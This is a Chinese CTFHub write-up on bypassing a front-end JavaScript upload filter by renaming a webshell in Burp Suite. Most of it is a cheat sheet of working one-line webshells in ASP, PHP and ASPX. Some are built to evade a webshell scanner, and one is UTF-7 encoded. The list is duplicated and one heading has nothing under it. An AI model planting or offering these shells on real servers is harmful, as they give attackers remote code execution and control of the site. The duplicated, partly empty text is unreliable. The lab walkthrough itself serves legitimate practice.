CTFHub题解
文件上传 js前端验证
查看该页面源代码,发现该页面允许上传的文件类型为.jpg,.png,.gif
于是上传一句话木马yjh.jpg,使用Burp Suite进行抓包后,将所上传文件后缀名改为.php,再进行放包
连接中国蚁剑,进行添加数据,就得到了flag
相关知识点
常见一句话木马
常用一句话木马
asp一句话木马:
<%execute(request(“value”))%>
php一句话木马:
<?php @eval($_POST["value"]);?>aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
其他一句话木马:
<%eval request(“value”)%>
<%execute request(“value”)%>
<%execute(request(“value”))%>
<%If Request(“value”)<>"" Then Execute(Request(“value”))%>
<%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”],“unsafe”);%>
可以躲过雷客图的一句话木马:
<%
set ms = server.CreateObject(“MSScriptControl.ScriptControl.1”)
ms.Language=“VBScript”
ms.AddObject “Response”, Response
ms.AddObject “request”, request
ms.ExecuteStatement(“ev”&“al(request(”“value”"))")
%>
不用’<,>'的asp一句话木马:
不用双引号的一句话木马:
<%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset="936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>常用一句话木马
asp一句话木马:
<%execute(request(“value”))%>
php一句话木马:
<?php @eval($_POST["value"]);?>aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
其他一句话木马:
<%eval request(“value”)%>
<%execute request(“value”)%>
<%execute(request(“value”))%>
<%If Request(“value”)<>"" Then Execute(Request(“value”))%>
<%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”],“unsafe”);%>
可以躲过雷客图的一句话木马:
<%
set ms = server.CreateObject(“MSScriptControl.ScriptControl.1”)
ms.Language=“VBScript”
ms.AddObject “Response”, Response
ms.AddObject “request”, request
ms.ExecuteStatement(“ev”&“al(request(”“value”"))")
%>
不用’<,>'的asp一句话木马:
不用双引号的一句话木马:
<%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset="936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>